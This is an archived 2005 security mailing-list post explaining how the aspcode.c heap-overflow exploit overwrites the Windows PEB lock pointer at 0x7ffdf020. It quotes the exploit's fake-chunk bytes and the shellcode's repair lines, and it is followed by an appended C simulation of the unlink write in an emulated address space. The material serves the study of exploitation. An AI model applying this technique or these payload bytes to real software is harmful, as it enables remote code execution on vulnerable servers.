List: dailydave
Subject: [Dailydave] about 0x7ffdf020 of aspcode.c (now utf-8)
From: "yuange" <yuange () nsfocus ! com>
Date: 2005-01-24 17:16:19
Message-ID: 003901c50238$6e7da7c0$0407a8c0 () windows
About aspcode.c http://packetstormsecurity.nl/0209-exploits/aspcode.c
1. The book <<The Shellcoder's Handbook>>, page 143:
A better strategy is to set the PEB lock to RtlEnterCriticalSection, as
follows:
k=0x7ffdf020;
*(int *)k=RtlEnterCriticalSectionadd;
2. http://cert.uni-stuttgart.de/archive/vuln-dev/2003/06/msg00095.html:
Well, Halvar uses the PEB technique to find kernel32.dll and related
infoz. Check out http://packetstormsecurity.nl/0209-exploits/aspcode.c for
an exploit in typical Chinese style using the SEH technique. Note how the
exploit's shellcode is about three pages of C code, which gets compiled by
Visual Studio into shellcode.
I'm still trying to figure out what these two lines really do...
k=0x7ffdf020;
*(int *)k=RtlEnterCriticalSectionadd;
Something to do with thread locking, obviously, but what?
Dave Aitel
Immunity, Inc.
Hack like a pro, without all the Mountain Dew:
http://www.immunitysec.com/CANVAS/
aspcode.c is a heap buffer overflow exploit.
A heap buffer overflow can write anything anywhere:
*p1=p2;
*(p2+4)=p1;
My code is p2+4=0x7ffdf020. You can see the code of aspcode.c:
char buff7[]="\x10\x00\x01\x02\x03\x04\x05\x06\x1c\xf0\xfd\x7f\x20\x21\x00\x01";
(\x1c\xf0\xfd\x7f = 0x7ffdf01c)
The shellcode must repair the function pointer, so you can see
k=0x7ffdf020;
*(int *)k=RtlEnterCriticalSectionadd;
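What the two overwrites and the repair amount to, as an added example that is not code from the message, the book or aspcode.c: a simulated 32-bit address space in which the free-list unlink of a Windows-style allocator is run over the fake chunk built from buff7. Assumptions, labelled here and in the comments: buff7 is read as an 8-byte chunk header followed by flink and blink, so its last four bytes give p1 = 0x01002120 (the message only identifies p2 = 0x7ffdf01c); the overflowed buffer is placed at 0x01000000; and 0x7c901005 is a constructed stand-in for the real RtlEnterCriticalSection address. The slot at 0x7ffdf020 is the PEB's FastPebLockRoutine, which RtlAcquirePebLock calls through whenever the process takes the PEB lock; that is why control reaches the heap, and why the shellcode must put RtlEnterCriticalSection back before anything takes that lock again.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Guest addresses from the message; the heap base is an assumption of this example. */
#define PEB_BASE   0x7ffdf000u
#define PEB_LOCK   (PEB_BASE + 0x20u)   /* FastPebLockRoutine slot = 0x7ffdf020 */
#define PEB_SIZE   0x1000u
#define HEAP_BASE  0x01000000u          /* assumed: where the overflowed buffer lives */
#define HEAP_SIZE  0x10000u

static uint8_t heap_mem[HEAP_SIZE];
static uint8_t peb_mem[PEB_SIZE];

/* Map a 32-bit guest address to simulator storage for a 4-byte access;
 * NULL when unmapped, which is where the real process would fault. */
static uint8_t *translate(uint32_t va) {
    if (va >= HEAP_BASE && va - HEAP_BASE + 4 <= HEAP_SIZE) return heap_mem + (va - HEAP_BASE);
    if (va >= PEB_BASE && va - PEB_BASE + 4 <= PEB_SIZE) return peb_mem + (va - PEB_BASE);
    return NULL;
}

/* Little-endian 32-bit reads and writes into the simulated address space. */
static uint32_t rd32(uint32_t va) {
    const uint8_t *p = translate(va);
    assert(p != NULL);
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static void wr32(uint32_t va, uint32_t v) {
    uint8_t *p = translate(va);
    assert(p != NULL);
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* The 16 bytes aspcode.c places in buff7. Reading them as an 8-byte chunk
 * header, then flink, then blink is this example's assumption; the message
 * itself only says that \x1c\xf0\xfd\x7f is 0x7ffdf01c. */
static const uint8_t buff7[16] = {
    0x10, 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06,   /* fake chunk header */
    0x1c, 0xf0, 0xfd, 0x7f,                           /* flink = p2 = 0x7ffdf01c */
    0x20, 0x21, 0x00, 0x01                            /* blink = p1 = 0x01002120 (assumed) */
};

/* The unlink a 32-bit free-list allocator performs when it takes the chunk
 * off its list: blink->flink = flink; flink->blink = blink. With attacker
 * chosen flink/blink that is exactly the message's *p1 = p2; *(p2+4) = p1.
 * Returns 0, or -1 if either target is unmapped (a real process would crash). */
static int unlink_fake_chunk(uint32_t chunk) {
    uint32_t p2 = rd32(chunk + 8);
    uint32_t p1 = rd32(chunk + 12);
    if (translate(p1) == NULL || translate(p2 + 4) == NULL) return -1;
    wr32(p1, p2);        /* *p1 = p2     : scribbles 0x7ffdf01c into the heap, harmless */
    wr32(p2 + 4, p1);    /* *(p2+4) = p1 : 0x7ffdf020 now points into the heap, at the shellcode */
    return 0;
}

/* The book's two lines, k = 0x7ffdf020; *(int *)k = RtlEnterCriticalSectionadd;,
 * which the shellcode runs before anything else takes the PEB lock. */
static void repair_peb_lock(uint32_t rtl_enter_critical_section) {
    wr32(PEB_LOCK, rtl_enter_critical_section);
}

/* Stand-in for RtlAcquirePebLock: the address the process would call
 * through FastPebLockRoutine right now. */
static uint32_t peb_lock_target(void) {
    return rd32(PEB_LOCK);
}

/* Set up the pre-overflow state, land buff7 on the chunk at `chunk`, run the
 * unlink. Returns the value now sitting at 0x7ffdf020 (0 if the unlink faulted). */
static uint32_t run_overflow(uint32_t chunk, uint32_t rtl_enter_critical_section) {
    memset(heap_mem, 0, sizeof heap_mem);
    memset(peb_mem, 0, sizeof peb_mem);
    wr32(PEB_LOCK, rtl_enter_critical_section);       /* normal state: PEB+0x20 -> RtlEnterCriticalSection */
    memcpy(heap_mem + (chunk - HEAP_BASE), buff7, sizeof buff7);  /* the overflow writes the fake chunk */
    if (unlink_fake_chunk(chunk) != 0) return 0;
    return peb_lock_target();
}

int main(void) {
    const uint32_t rtl_enter_cs = 0x7c901005u;   /* constructed stand-in, not the real address */
    const uint32_t chunk = HEAP_BASE + 0x2000u;  /* assumed location of the fake free chunk */
    uint32_t hijacked = run_overflow(chunk, rtl_enter_cs);
    printf("after unlink: *0x%08x = 0x%08x (p1), *0x%08x = 0x%08x (p2)\n",
           (unsigned)PEB_LOCK, (unsigned)hijacked, (unsigned)hijacked, (unsigned)rd32(hijacked));
    repair_peb_lock(rtl_enter_cs);
    printf("after repair: *0x%08x = 0x%08x\n", (unsigned)PEB_LOCK, (unsigned)peb_lock_target());
    return 0;
}
```

The unmapped check in unlink_fake_chunk is the practical caveat: both p1 and p2+4 must be writable, so p2 has to be chosen as target-4 (0x7ffdf01c for a target of 0x7ffdf020) and p1 has to be a real, writable heap address, since the allocator writes through both of them before anything else happens.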